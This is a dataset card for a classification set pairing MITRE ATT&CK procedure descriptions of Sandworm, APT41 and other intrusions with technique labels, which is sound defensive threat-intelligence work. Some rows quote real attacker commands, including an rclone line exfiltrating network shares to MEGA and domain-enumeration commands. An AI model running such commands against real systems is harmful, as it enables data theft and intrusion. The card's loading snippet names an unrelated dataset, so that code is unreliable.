Datasets:
Tasks:
Text Classification
Modalities:
Text
Formats:
csv
Languages:
English
Size:
10K - 100K
License:
text
stringlengths 23
517
| label
stringclasses 552
values |
---|---|
During the 2015 Ukraine Electric Power Attack, Sandworm Team modified in-registry internet settings to lower internet security. | T1562.001: Impair Defenses- Disable or Modify Tools |
During the 2015 Ukraine Electric Power Attack, Sandworm Team created privileged domain accounts to be used for further exploitation and lateral movement. | T1136.002: Create Account- Domain Account |
During the 2015 Ukraine Electric Power Attack, Sandworm Team installed a modified Dropbear SSH client as the backdoor to target systems. | T1133: External Remote Services |
During the 2015 Ukraine Electric Power Attack, vba_macro.exe deletes itself after `FONTCACHE.DAT`, `rundll32.exe`, and the associated .lnk file is delivered. | T1070.004: Indicator Removal- File Deletion |
During the 2015 Ukraine Electric Power Attack, Sandworm Team pushed additional malicious tools onto an infected system to steal user credentials, move laterally, and destroy data. | T1105: Ingress Tool Transfer |
During the 2015 Ukraine Electric Power Attack, Sandworm Team gathered account credentials via a BlackEnergy keylogger plugin. | T1056.001: Input Capture- Keylogging |
During the 2015 Ukraine Electric Power Attack, Sandworm Team moved their tools laterally within the corporate network and between the ICS and corporate network. | T1570: Lateral Tool Transfer |
During the 2015 Ukraine Electric Power Attack, Sandworm Team leveraged Microsoft Office attachments which contained malicious macros that were automatically executed once the user permitted them. | T1204.002: User Execution- Malicious File |
During the 2015 Ukraine Electric Power Attack, Sandworm Team modified in-registry Internet settings to lower internet security before launching `rundll32.exe`, which in-turn launches the malware and communicates with C2 servers over the Internet. . | T1112: Modify Registry |
During the 2015 Ukraine Electric Power Attack, Sandworm Team used BlackEnergy’s network sniffer module to discover user credentials being sent over the network between the local LAN and the power grid’s industrial control systems. | T1040: Network Sniffing |
During the 2015 Ukraine Electric Power Attack, Sandworm Team loaded BlackEnergy into svchost.exe, which then launched iexplore.exe for their C2. | T1055: Process Injection |
During the 2015 Ukraine Electric Power Attack, Sandworm Team remotely discovered systems over LAN connections. OT systems were visible from the IT network as well, giving adversaries the ability to discover operational assets. | T1018: Remote System Discovery |
During the 2015 Ukraine Electric Power Attack, Sandworm Team used a backdoor which could execute a supplied DLL using `rundll32.exe`. | T1218.011: System Binary Proxy Execution- Rundll32 |
During the 2015 Ukraine Electric Power Attack, Sandworm Team obtained their initial foothold into many IT systems using Microsoft Office attachments delivered through phishing emails. | T1566.001: Phishing- Spearphishing Attachment |
During the 2015 Ukraine Electric Power Attack, Sandworm Team used valid accounts on the corporate network to escalate privileges, move laterally, and establish persistence within the corporate network. | T1078: Valid Accounts |
During the 2015 Ukraine Electric Power Attack, Sandworm Team installed a VBA script called `vba_macro.exe`. This macro dropped `FONTCACHE.DAT`, the primary BlackEnergy implant; `rundll32.exe`, for executing the malware; `NTUSER.log`, an empty file; and desktop.ini, the default file used to determine folder displays on Windows machines. | T1059.005: Command and Scripting Interpreter- Visual Basic |
During the 2015 Ukraine Electric Power Attack, Sandworm Team used BlackEnergy to communicate between compromised hosts and their command-and-control servers via HTTP post requests. | T1071.001: Application Layer Protocol- Web Protocols |
During the 2016 Ukraine Electric Power Attack, Sandworm Team used the `sp_addlinkedsrvlogin` command in MS-SQL to create a link between a created account and other servers in the network. | T1098: Account Manipulation |
During the 2016 Ukraine Electric Power Attack, Sandworm Team used a script to attempt RPC authentication against a number of hosts. | T1110: Brute Force |
During the 2016 Ukraine Electric Power Attack, Sandworm Team used a trojanized version of Windows Notepad to add a layer of persistence for Industroyer. | T1554: Compromise Host Software Binary |
During the 2016 Ukraine Electric Power Attack, Sandworm Team added a login to a SQL Server with `sp_addlinkedsrvlogin`. | T1136: Create Account |
During the 2016 Ukraine Electric Power Attack, Sandworm Team disabled event logging on compromised systems. | T1562.002: Impair Defenses- Disable Windows Event Logging |
During the 2016 Ukraine Electric Power Attack, Sandworm Team created two new accounts, “admin” and “система” . The accounts were then assigned to a domain matching local operation and were delegated new privileges. | T1136.002: Create Account- Domain Account |
During the 2016 Ukraine Electric Power Attack, Sandworm Team used Mimikatz to capture and use legitimate credentials. | T1003.001: OS Credential Dumping- LSASS Memory |
During the 2016 Ukraine Electric Power Attack, Sandworm Team used `move` to transfer files to a network share. | T1570: Lateral Tool Transfer |
During the 2016 Ukraine Electric Power Attack, Sandworm Team created two new accounts, “admin” and “система” . | T1036.010: Masquerading- Masquerade Account Name |
During the 2016 Ukraine Electric Power Attack, Sandworm Team masqueraded executables as `.txt` files. | T1036.008: Masquerading- Masquerade File Type |
During the 2016 Ukraine Electric Power Attack, DLLs and EXEs with filenames associated with common electric power sector protocols were used to masquerade files. | T1036.005: Masquerading- Match Legitimate Name or Location |
During the 2016 Ukraine Electric Power Attack, Sandworm Team used heavily obfuscated code with Industroyer in its Windows Notepad backdoor. | T1027: Obfuscated Files or Information |
During the 2016 Ukraine Electric Power Attack, Sandworm Team used PowerShell scripts to run a credential harvesting tool in memory to evade defenses. | T1059.001: Command and Scripting Interpreter- PowerShell |
During the 2016 Ukraine Electric Power Attack, Sandworm Team checked for connectivity to resources within the network and used LDAP to query Active Directory, discovering information about computers listed in AD. | T1018: Remote System Discovery |
During the 2016 Ukraine Electric Power Attack, Sandworm Team utilized `net use` to connect to network shares. | T1021.002: Remote Services- SMB/Windows Admin Shares |
During the 2016 Ukraine Electric Power Attack, Sandworm Team used various MS-SQL stored procedures. | T1505.001: Server Software Component- SQL Stored Procedures |
During the 2016 Ukraine Electric Power Attack, Sandworm Team used UPX to pack a copy of Mimikatz. | T1027.002: Obfuscated Files or Information- Software Packing |
During the 2016 Ukraine Electric Power Attack, Sandworm Team created VBScripts to run on an SSH server. | T1059.005: Command and Scripting Interpreter- Visual Basic |
During the 2016 Ukraine Electric Power Attack, Sandworm Team used the `xp_cmdshell` command in MS-SQL. | T1059.003: Command and Scripting Interpreter- Windows Command Shell |
During the 2016 Ukraine Electric Power Attack, WMI in scripts were used for remote execution and system surveys. | T1047: Windows Management Instrumentation |
During the 2016 Ukraine Electric Power Attack, Sandworm Team used an arbitrary system service to load at system boot for persistence for Industroyer. They also replaced the ImagePath registry value of a Windows service with a new backdoor binary. | T1543.003: Create or Modify System Process- Windows Service |
During the 2022 Ukraine Electric Power Attack, Sandworm Team deployed CaddyWiper on the victim’s IT environment systems to wipe files related to the OT capabilities, along with mapped drives, and physical drive partitions. | T1485: Data Destruction |
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Group Policy Objects to deploy and execute malware. | T1484.001: Domain or Tenant Policy Modification- Group Policy Modification |
During the 2022 Ukraine Electric Power Attack, Sandworm Team used a Group Policy Object to copy CaddyWiper's executable `msserver.exe` from a staging server to a local hard drive before deployment. | T1570: Lateral Tool Transfer |
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Systemd service units to masquerade GOGETTER malware as legitimate or seemingly legitimate services. | T1036.004: Masquerading- Masquerade Task or Service |
During the 2022 Ukraine Electric Power Attack, Sandworm Team proxied C2 communications within a TLS-based tunnel. | T1095: Non-Application Layer Protocol |
During the 2022 Ukraine Electric Power Attack, Sandworm Team utilized a PowerShell utility called TANKTRAP to spread and launch a wiper using Windows Group Policy. | T1059.001: Command and Scripting Interpreter- PowerShell |
During the 2022 Ukraine Electric Power Attack, Sandworm Team deployed the GOGETTER tunneler software to establish a “Yamux” TLS-based C2 channel with an external server. | T1572: Protocol Tunneling |
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object to execute CaddyWiper at a predetermined time. | T1053.005: Scheduled Task/Job- Scheduled Task |
During the 2022 Ukraine Electric Power Attack, Sandworm Team configured Systemd to maintain persistence of GOGETTER, specifying the `WantedBy=multi-user.target` configuration to run GOGETTER when the system begins accepting user logins. | T1543.002: Create or Modify System Process- Systemd Service |
During the 2022 Ukraine Electric Power Attack, Sandworm Team deployed the Neo-REGEORG webshell on an internet-facing server. | T1505.003: Server Software Component- Web Shell |
APT41 DUST used `rar` to compress data downloaded from internal Oracle databases prior to exfiltration. | T1560.001: Archive Collected Data- Archive via Utility |
APT41 DUST used HTTPS for command and control. | T1573.002: Encrypted Channel- Asymmetric Cryptography |
APT41 DUST used tools such as SQLULDR2 and PINEGROVE to gather local system and database information. | T1119: Automated Collection |
APT41 DUST used compromised Google Workspace accounts for command and control. | T1586.003: Compromise Accounts- Cloud Accounts |
APT41 DUST used stolen code signing certificates for DUSTTRAP malware and subsequent payloads. | T1553.002: Subvert Trust Controls- Code Signing |
APT41 DUST used stolen code signing certificates to sign DUSTTRAP malware and components. | T1588.003: Obtain Capabilities- Code Signing Certificates |
APT41 DUST involved the use of DLL search order hijacking to execute DUSTTRAP. | T1574.001: Hijack Execution Flow- DLL Search Order Hijacking |
APT41 DUST used DLL side-loading to execute DUSTTRAP via an AhnLab uninstaller. | T1574.002: Hijack Execution Flow- DLL Side-Loading |
APT41 DUST collected data from victim Oracle databases using SQLULDR2. | T1213: Data from Information Repositories |
APT41 DUST used encrypted payloads decrypted and executed in memory. | T1027.013: Obfuscated Files or Information- Encrypted/Encoded File |
APT41 DUST exfiltrated collected information to OneDrive. | T1567.002: Exfiltration Over Web Service- Exfiltration to Cloud Storage |
APT41 DUST deleted various artifacts from victim systems following use. | T1070.004: Indicator Removal- File Deletion |
APT41 DUST involved execution of `certutil.exe` via web shell to download the DUSTPAN dropper. | T1105: Ingress Tool Transfer |
APT41 DUST involved exporting data from Oracle databases to local CSV files prior to exfiltration. | T1074.001: Data Staged- Local Data Staging |
APT41 DUST disguised DUSTPAN as a legitimate Windows binary such as `w3wp.exe` or `conn.exe`. | T1036.004: Masquerading- Masquerade Task or Service |
APT41 DUST used internet scan data for target development. | T1596.005: Search Open Technical Databases- Scan Databases |
APT41 DUST involved use of search engines to research victim servers. | T1593.002: Search Open Websites/Domains- Search Engines |
APT41 DUST involved access of external victim websites for target development. | T1594: Search Victim-Owned Websites |
APT41 DUST used infrastructure hosted behind Cloudflare or utilized Cloudflare Workers for command and control. | T1583.007: Acquire Infrastructure- Serverless |
APT41 DUST used Windows services to execute DUSTPAN. | T1569.002: System Services- Service Execution |
APT41 DUST used HTTPS for command and control. | T1071.001: Application Layer Protocol- Web Protocols |
APT41 DUST used compromised Google Workspace accounts for command and control. | T1102: Web Service |
APT41 DUST involved use of web shells such as ANTSWORD and BLUEBEAM for persistence. | T1505.003: Server Software Component- Web Shell |
APT41 DUST used Windows Services with names such as `Windows Defend` for persistence of DUSTPAN. | T1543.003: Create or Modify System Process- Windows Service |
For C0010, UNC3890 actors established domains that appeared to be legitimate services and entities, such as LinkedIn, Facebook, Office 365, and Pfizer. | T1583.001: Acquire Infrastructure- Domains |
During C0010, UNC3890 actors likely compromised the domain of a legitimate Israeli shipping company. | T1584.001: Compromise Infrastructure- Domains |
During C0010, UNC3890 actors likely established a watering hole that was hosted on a login page of a legitimate Israeli shipping company that was active until at least November 2021. | T1189: Drive-by Compromise |
For C0010, the threat actors compromised the login page of a legitimate Israeli shipping company and likely established a watering hole that collected visitor information. | T1608.004: Stage Capabilities- Drive-by Target |
During C0010, UNC3890 actors downloaded tools and malware onto a compromised host. | T1105: Ingress Tool Transfer |
For C0010, UNC3890 actors used unique malware, including SUGARUSH and SUGARDUMP. | T1587.001: Develop Capabilities- Malware |
For C0010, UNC3890 actors obtained multiple publicly-available tools, including METASPLOIT, UNICORN, and NorthStar C2. | T1588.002: Obtain Capabilities- Tool |
For C0010, UNC3890 actors staged malware on their infrastructure for direct download onto a compromised system. | T1608.001: Stage Capabilities- Upload Malware |
For C0010, UNC3890 actors staged tools on their infrastructure to download directly onto a compromised system. | T1608.002: Stage Capabilities- Upload Tool |
For C0011, Transparent Tribe established SSL certificates on the typo-squatted domains the group registered. | T1587.003: Develop Capabilities- Digital Certificates |
For C0011, Transparent Tribe registered domains likely designed to appear relevant to student targets in India. | T1583.001: Acquire Infrastructure- Domains |
During C0011, Transparent Tribe relied on a student target to open a malicious document delivered via email. | T1204.002: User Execution- Malicious File |
During C0011, Transparent Tribe relied on student targets to click on a malicious link sent via email. | T1204.001: User Execution- Malicious Link |
During C0011, Transparent Tribe sent malicious attachments via email to student targets in India. | T1566.001: Phishing- Spearphishing Attachment |
During C0011, Transparent Tribe sent emails containing a malicious link to student targets in India. | T1566.002: Phishing- Spearphishing Link |
For C0011, Transparent Tribe hosted malicious documents on domains registered by the group. | T1608.001: Stage Capabilities- Upload Malware |
For C0011, Transparent Tribe used malicious VBA macros within a lure document as part of the Crimson malware installation process onto a compromised host. | T1059.005: Command and Scripting Interpreter- Visual Basic |
For C0015, the threat actors used DLL files that had invalid certificates. | T1553.002: Subvert Trust Controls- Code Signing |
During C0015, the threat actors used Conti ransomware to encrypt a compromised network. | T1486: Data Encrypted for Impact |
During C0015, the threat actors limited Rclone's bandwidth setting during exfiltration. | T1030: Data Transfer Size Limits |
During C0015, the threat actors obtained files and data from the compromised network. | T1005: Data from Local System |
During C0015, the threat actors collected files from network shared drives prior to network encryption. | T1039: Data from Network Shared Drive |
During C0015, the threat actors use the command `net group "domain admins" /dom` to enumerate domain groups. | T1069.002: Permission Groups Discovery- Domain Groups |
During C0015, the threat actors used the command `nltest /domain_trusts /all_trusts` to enumerate domain trusts. | T1482: Domain Trust Discovery |
During C0015, the threat actors used a DLL named `D8B3.dll` that was injected into the Winlogon process. | T1055.001: Process Injection- Dynamic-link Library Injection |
During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command `rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M`. | T1567.002: Exfiltration Over Web Service- Exfiltration to Cloud Storage |
During C0015, the threat actors conducted a file listing discovery against multiple hosts to ensure locker encryption was successful. | T1083: File and Directory Discovery |
During C0015, the threat actors downloaded additional tools and files onto a compromised network. | T1105: Ingress Tool Transfer |
End of preview. Expand
in Dataset Viewer.
cyber_MITRE_technique_CTI_dataset_v16
This dataset contains procedural descriptions from the MITRE ATT&CK framework (v16, Enterprise version). Each entry includes a text column detailing a specific attack method, while the corresponding label indicates the technique associated with the procedure. The dataset is designed for text classification tasks, aimed at identifying and categorizing attack behaviors based on the described methods.
Data Instances
An example looks as follows:
{'text': 'zwShell has established persistence by adding itself as a new service.',
'label': 'T1543.003: Create or Modify System Process- Windows Service'}
Data Fields
The data fields are the same among all configurations:
- text (str): A procedure for an attack from MITRE.
- label (str): Corresponding technique in MITRE ATT&CK v16 (enterprise).
Curation Process
Using the Dataset You can easily download and utilize the MITRE CTI with corresponding technique with Hugging Face's datasets library:
from datasets import load_dataset
# The entire dataset is available for use
dataset = load_dataset("sarahwei/Taiwanese-Minnan-Sutiau")
print(dataset)
Source Data
- Downloads last month
- 5